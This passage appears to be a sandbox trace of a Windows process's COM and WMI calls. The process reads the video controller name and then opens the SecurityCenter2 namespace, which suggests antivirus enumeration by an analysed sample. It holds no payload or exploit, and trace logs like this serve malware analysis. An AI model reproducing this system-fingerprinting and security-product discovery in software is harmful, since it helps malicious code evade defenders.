(in: This=0x593e3fc, lTimeout=-1, uCount=0x1, apObjects=0x4b29760, puReturned=0x26d3bc0 | out: apObjects=0x4b29760*=0x593e438, puReturned=0x26d3bc0*=0x1) returned 0x0 [0133.995] IUnknown:QueryInterface (in: This=0x593e438, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1897a8 | out: ppvObject=0x1897a8*=0x593e438) returned 0x0 [0133.995] IUnknown:QueryInterface (in: This=0x593e438, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189764 | out: ppvObject=0x189764*=0x0) returned 0x80004002 [0133.995] IUnknown:QueryInterface (in: This=0x593e438, riid=0x7455fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189584 | out: ppvObject=0x189584*=0x0) returned 0x80004002 [0133.995] IUnknown:AddRef (This=0x593e438) returned 0x3 [0133.995] IUnknown:QueryInterface (in: This=0x593e438, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1890c4 | out: ppvObject=0x1890c4*=0x0) returned 0x80004002 [0133.995] IUnknown:QueryInterface (in: This=0x593e438, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x189074 | out: ppvObject=0x189074*=0x0) returned 0x80004002 [0133.995] IUnknown:QueryInterface (in: This=0x593e438, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189080 | out: ppvObject=0x189080*=0x593e43c) returned 0x0 [0133.995] IMarshal:GetUnmarshalClass (in: This=0x593e43c, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189088 | out: pCid=0x189088*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0133.995] IUnknown:Release (This=0x593e43c) returned 0x3 [0133.995] CoGetContextToken (in: pToken=0x1890e0 | out: pToken=0x1890e0) returned 0x0 [0133.995] CoGetContextToken (in: pToken=0x1894e8 | out: pToken=0x1894e8) returned 0x0 [0133.995] IUnknown:QueryInterface (in: This=0x593e438, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189578 | out: ppvObject=0x189578*=0x0) returned 0x80004002 [0133.996] IUnknown:Release (This=0x593e438) returned 0x2 [0133.996] CoGetContextToken (in: pToken=0x189ab8 | out: pToken=0x189ab8) returned 0x0 [0133.996] CoGetContextToken (in: pToken=0x189a18 | out: pToken=0x189a18) returned 0x0 [0133.996] IUnknown:QueryInterface (in: This=0x593e438, riid=0x189ae8*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x189ae4 | out: ppvObject=0x189ae4*=0x593e438) returned 0x0 [0133.996] IUnknown:AddRef (This=0x593e438) returned 0x4 [0133.996] IUnknown:Release (This=0x593e438) returned 0x3 [0133.996] IUnknown:Release (This=0x593e438) returned 0x2 [0133.996] CoTaskMemFree (pv=0x4b29760) [0133.996] CoGetContextToken (in: pToken=0x189e28 | out: pToken=0x189e28) returned 0x0 [0133.996] IUnknown:AddRef (This=0x593e438) returned 0x3 [0133.996] IWbemClassObject:Get (in: This=0x593e438, wszName="__GENUS", lFlags=0, pVal=0x18a138*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18a1b8*=0, plFlavor=0x18a1b4*=0 | out: pVal=0x18a138*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x18a1b8*=3, plFlavor=0x18a1b4*=64) returned 0x0 [0133.996] IWbemClassObject:Get (in: This=0x593e438, wszName="__PATH", lFlags=0, pVal=0x18a11c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18a1a0*=0, plFlavor=0x18a19c*=0 | out: pVal=0x18a11c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\YKYD69Q\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"", varVal2=0x0), pType=0x18a1a0*=8, plFlavor=0x18a19c*=64) returned 0x0 [0133.996] SysStringByteLen (bstr="\\\\YKYD69Q\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x8c [0133.996] SysStringByteLen (bstr="\\\\YKYD69Q\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x8c [0133.996] CoGetObjectContext (in: riid=0x26c86b8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a148 | out: ppv=0x18a148*=0x75849c) returned 0x0 [0133.996] IComThreadingInfo:GetCurrentApartmentType (in: This=0x75849c, pAptType=0x18a140 | out: pAptType=0x18a140*=1) returned 0x0 [0133.996] IUnknown:QueryInterface (in: This=0x75849c, riid=0x26c86a0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a144 | out: ppvObject=0x18a144*=0x0) returned 0x80004002 [0133.996] IUnknown:Release (This=0x75849c) returned 0x1 [0133.997] CoGetClassObject (in: rclsid=0x4bf972c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x744bd1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189ab0 | out: ppv=0x189ab0*=0x593d268) returned 0x0 [0133.997] WbemDefPath:IUnknown:QueryInterface (in: This=0x593d268, riid=0x744f0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189cc8 | out: ppvObject=0x189cc8*=0x0) returned 0x80004002 [0133.997] WbemDefPath:IClassFactory:CreateInstance (in: This=0x593d268, pUnkOuter=0x0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189cdc | out: ppvObject=0x189cdc*=0x59412d0) returned 0x0 [0133.997] WbemDefPath:IUnknown:Release (This=0x593d268) returned 0x0 [0133.997] WbemDefPath:IUnknown:QueryInterface (in: This=0x59412d0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898fc | out: ppvObject=0x1898fc*=0x59412d0) returned 0x0 [0133.997] WbemDefPath:IUnknown:QueryInterface (in: This=0x59412d0, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1898b8 | out: ppvObject=0x1898b8*=0x0) returned 0x80004002 [0133.997] WbemDefPath:IUnknown:AddRef (This=0x59412d0) returned 0x3 [0133.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x59412d0, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x189214 | out: ppvObject=0x189214*=0x0) returned 0x80004002 [0133.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x59412d0, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1891c4 | out: ppvObject=0x1891c4*=0x0) returned 0x80004002 [0133.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x59412d0, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1891d0 | out: ppvObject=0x1891d0*=0x4b29760) returned 0x0 [0133.998] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x4b29760, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1891d8 | out: pCid=0x1891d8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0133.998] WbemDefPath:IUnknown:Release (This=0x4b29760) returned 0x3 [0133.998] CoGetContextToken (in: pToken=0x189230 | out: pToken=0x189230) returned 0x0 [0133.998] CoGetContextToken (in: pToken=0x189638 | out: pToken=0x189638) returned 0x0 [0133.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x59412d0, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1896c8 | out: ppvObject=0x1896c8*=0x0) returned 0x80004002 [0133.998] WbemDefPath:IUnknown:Release (This=0x59412d0) returned 0x2 [0133.998] WbemDefPath:IUnknown:Release (This=0x59412d0) returned 0x1 [0133.998] CoGetContextToken (in: pToken=0x189fc0 | out: pToken=0x189fc0) returned 0x0 [0133.998] CoGetContextToken (in: pToken=0x189f20 | out: pToken=0x189f20) returned 0x0 [0133.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x59412d0, riid=0x189ff0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x189fec | out: ppvObject=0x189fec*=0x59412d0) returned 0x0 [0133.998] WbemDefPath:IUnknown:AddRef (This=0x59412d0) returned 0x3 [0133.998] WbemDefPath:IUnknown:Release (This=0x59412d0) returned 0x2 [0133.998] WbemDefPath:IWbemPath:SetText (This=0x59412d0, uMode=0x4, pszPath="\\\\YKYD69Q\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x0 [0133.998] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5930820, puCount=0x18a174 | out: puCount=0x18a174*=0x2) returned 0x0 [0133.998] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a170*=0x0, pszText=0x0 | out: puBuffLength=0x18a170*=0xf, pszText=0x0) returned 0x0 [0133.998] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a170*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a170*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0133.998] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5930820, puCount=0x18a13c | out: puCount=0x18a13c*=0x2) returned 0x0 [0133.998] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a138*=0x0, pszText=0x0 | out: puBuffLength=0x18a138*=0xf, pszText=0x0) returned 0x0 [0133.998] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a138*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a138*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0133.998] IWbemClassObject:Get (in: This=0x593e438, wszName="Name", lFlags=0, pVal=0x18a138*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26d440c*=0, plFlavor=0x26d4410*=0 | out: pVal=0x18a138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NVIDIA GeForce GT 730M", varVal2=0x0), pType=0x26d440c*=8, plFlavor=0x26d4410*=32) returned 0x0 [0133.998] SysStringByteLen (bstr="NVIDIA GeForce GT 730M") returned 0x2c [0133.999] SysStringByteLen (bstr="NVIDIA GeForce GT 730M") returned 0x2c [0133.999] IWbemClassObject:Get (in: This=0x593e438, wszName="Name", lFlags=0, pVal=0x18a140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26d440c*=8, plFlavor=0x26d4410*=32 | out: pVal=0x18a140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NVIDIA GeForce GT 730M", varVal2=0x0), pType=0x26d440c*=8, plFlavor=0x26d4410*=32) returned 0x0 [0133.999] SysStringByteLen (bstr="NVIDIA GeForce GT 730M") returned 0x2c [0133.999] SysStringByteLen (bstr="NVIDIA GeForce GT 730M") returned 0x2c [0133.999] CoGetContextToken (in: pToken=0x18a048 | out: pToken=0x18a048) returned 0x0 [0133.999] WbemLocator:IUnknown:Release (This=0x4b30634) returned 0x1 [0133.999] IUnknown:Release (This=0x593e3fc) returned 0x0 [0134.021] CoGetObjectContext (in: riid=0x26c86b8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a14c | out: ppv=0x18a14c*=0x75849c) returned 0x0 [0134.021] IComThreadingInfo:GetCurrentApartmentType (in: This=0x75849c, pAptType=0x18a144 | out: pAptType=0x18a144*=1) returned 0x0 [0134.021] IUnknown:QueryInterface (in: This=0x75849c, riid=0x26c86a0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a148 | out: ppvObject=0x18a148*=0x0) returned 0x80004002 [0134.021] IUnknown:Release (This=0x75849c) returned 0x1 [0134.022] CoGetClassObject (in: rclsid=0x4bf972c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x744bd1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189ab8 | out: ppv=0x189ab8*=0x593d268) returned 0x0 [0134.022] WbemDefPath:IUnknown:QueryInterface (in: This=0x593d268, riid=0x744f0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189cd0 | out: ppvObject=0x189cd0*=0x0) returned 0x80004002 [0134.022] WbemDefPath:IClassFactory:CreateInstance (in: This=0x593d268, pUnkOuter=0x0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ce4 | out: ppvObject=0x189ce4*=0x593e370) returned 0x0 [0134.022] WbemDefPath:IUnknown:Release (This=0x593d268) returned 0x0 [0134.022] WbemDefPath:IUnknown:QueryInterface (in: This=0x593e370, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189904 | out: ppvObject=0x189904*=0x593e370) returned 0x0 [0134.022] WbemDefPath:IUnknown:QueryInterface (in: This=0x593e370, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1898c0 | out: ppvObject=0x1898c0*=0x0) returned 0x80004002 [0134.022] WbemDefPath:IUnknown:AddRef (This=0x593e370) returned 0x3 [0134.022] WbemDefPath:IUnknown:QueryInterface (in: This=0x593e370, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18921c | out: ppvObject=0x18921c*=0x0) returned 0x80004002 [0134.022] WbemDefPath:IUnknown:QueryInterface (in: This=0x593e370, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1891cc | out: ppvObject=0x1891cc*=0x0) returned 0x80004002 [0134.022] WbemDefPath:IUnknown:QueryInterface (in: This=0x593e370, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1891d8 | out: ppvObject=0x1891d8*=0x4b297a0) returned 0x0 [0134.023] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x4b297a0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1891e0 | out: pCid=0x1891e0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0134.023] WbemDefPath:IUnknown:Release (This=0x4b297a0) returned 0x3 [0134.023] CoGetContextToken (in: pToken=0x189238 | out: pToken=0x189238) returned 0x0 [0134.023] CoGetContextToken (in: pToken=0x189640 | out: pToken=0x189640) returned 0x0 [0134.023] WbemDefPath:IUnknown:QueryInterface (in: This=0x593e370, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1896d0 | out: ppvObject=0x1896d0*=0x0) returned 0x80004002 [0134.023] WbemDefPath:IUnknown:Release (This=0x593e370) returned 0x2 [0134.023] WbemDefPath:IUnknown:Release (This=0x593e370) returned 0x1 [0134.023] CoGetContextToken (in: pToken=0x189fc8 | out: pToken=0x189fc8) returned 0x0 [0134.023] CoGetContextToken (in: pToken=0x189f28 | out: pToken=0x189f28) returned 0x0 [0134.023] WbemDefPath:IUnknown:QueryInterface (in: This=0x593e370, riid=0x189ff8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x189ff4 | out: ppvObject=0x189ff4*=0x593e370) returned 0x0 [0134.023] WbemDefPath:IUnknown:AddRef (This=0x593e370) returned 0x3 [0134.023] WbemDefPath:IUnknown:Release (This=0x593e370) returned 0x2 [0134.023] WbemDefPath:IWbemPath:SetText (This=0x593e370, uMode=0x4, pszPath="root\\SecurityCenter2") returned 0x0 [0134.023] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x593e370, puCount=0x18a174 | out: puCount=0x18a174*=0x2) returned 0x0 [0134.023] WbemDefPath:IWbemPath:GetText (in: This=0x593e370, lFlags=4, puBuffLength=0x18a170*=0x0, pszText=0x0 | out: puBuffLength=0x18a170*=0x19, pszText=0x0) returned 0x0 [0134.023] WbemDefPath:IWbemPath:GetText (in: This=0x593e370, lFlags=4, puBuffLength=0x18a170*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x18a170*=0x19, pszText="\\\\.\\root\\SecurityCenter2") returned 0x0 [0134.023] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x593e370, puCount=0x18a160 | out: puCount=0x18a160*=0x2) returned 0x0 [0134.023] WbemDefPath:IWbemPath:GetText (in: This=0x593e370, lFlags=4, puBuffLength=0x18a15c*=0x0, pszText=0x0 | out: puBuffLength=0x18a15c*=0x19, pszText=0x0) returned 0x0 [0134.023] WbemDefPath:IWbemPath:GetText (in: This=0x593e370, lFlags=4, puBuffLength=0x18a15c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x18a15c*=0x19, pszText="\\\\.\\root\\SecurityCenter2") returned 0x0 [0134.023] CoGetObjectContext (in: riid=0x26c86b8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a0f0 | out: ppv=0x18a0f0*=0x75849c) returned 0x0 [0134.023] IComThreadingInfo:GetCurrentApartmentType (in: This=0x75849c, pAptType=0x18a0e8 | out: pAptType=0x18a0e8*=1) returned 0x0 [0134.023] IUnknown:QueryInterface (in: This=0x75849c, riid=0x26c86a0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a0ec | out: ppvObject=0x18a0ec*=0x0) returned 0x80004002 [0134.023] IUnknown:Release (This=0x75849c) returned 0x1 [0134.024] CoGetClassObject (in: rclsid=0x4bf975c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x744bd1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189d10 | out: ppv=0x189d10*=0x593d790) returned 0x0 [0134.024] WbemLocator:IUnknown:QueryInterface (in: This=0x593d790, riid=0x744f0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189f28 | out: ppvObject=0x189f28*=0x0) returned 0x80004002 [0134.024] WbemLocator:IClassFactory:CreateInstance (in: This=0x593d790, pUnkOuter=0x0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f3c | out: ppvObject=0x189f3c*=0x593e8f0) returned 0x0 [0134.024] WbemLocator:IUnknown:Release (This=0x593d790) returned 0x0 [0134.024] WbemLocator:IUnknown:QueryInterface (in: This=0x593e8f0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b5c | out: ppvObject=0x189b5c*=0x593e8f0) returned 0x0 [0134.024] WbemLocator:IUnknown:QueryInterface (in: This=0x593e8f0, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189b18 | out: ppvObject=0x189b18*=0x0) returned 0x80004002 [0134.024] WbemLocator:IUnknown:AddRef (This=0x593e8f0) returned 0x3 [0134.024] WbemLocator:IUnknown:QueryInterface (in: This=0x593e8f0, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x189474 | out: ppvObject=0x189474*=0x0) returned 0x80004002 [0134.024] WbemLocator:IUnknown:QueryInterface (in: This=0x593e8f0, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x189424 | out: ppvObject=0x189424*=0x0) returned 0x80004002 [0134.024] WbemLocator:IUnknown:QueryInterface (in: This=0x593e8f0, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189430 | out: ppvObject=0x189430*=0x0) returned 0x80004002 [0134.024] CoGetContextToken (in: pToken=0x189490 | out: pToken=0x189490) returned 0x0 [0134.025] CoGetContextToken (in: pToken=0x189898 | out: pToken=0x189898) returned 0x0 [0134.025] WbemLocator:IUnknown:QueryInterface (in: This=0x593e8f0, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189928 | out: ppvObject=0x189928*=0x0) returned 0x80004002 [0134.025] WbemLocator:IUnknown:Release (This=0x593e8f0) returned 0x2 [0134.025] WbemLocator:IUnknown:Release (This=0x593e8f0) returned 0x1 [0134.025] CoGetContextToken (in: pToken=0x189f08 | out: pToken=0x189f08) returned 0x0 [0134.025] CoGetContextToken (in: pToken=0x189e68 | out: pToken=0x189e68) returned 0x0 [0134.025] WbemLocator:IUnknown:QueryInterface (in: This=0x593e8f0, riid=0x189f38*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x189f34 | out: ppvObject=0x189f34*=0x593e8f0) returned 0x0 [0134.025] WbemLocator:IUnknown:AddRef (This=0x593e8f0) returned 0x3 [0134.025] WbemLocator:IUnknown:Release (This=0x593e8f0) returned 0x2 [0134.025] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x593e370, puCount=0x18a0cc | out: puCount=0x18a0cc*=0x2) returned 0x0 [0134.025] WbemDefPath:IWbemPath:GetText (in: This=0x593e370, lFlags=8, puBuffLength=0x18a0c8*=0x0, pszText=0x0 | out: puBuffLength=0x18a0c8*=0x19, pszText=0x0) returned 0x0 [0134.025] WbemDefPath:IWbemPath:GetText (in: This=0x593e370, lFlags=8, puBuffLength=0x18a0c8*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x18a0c8*=0x19, pszText="\\\\.\\root\\SecurityCenter2") returned 0x0 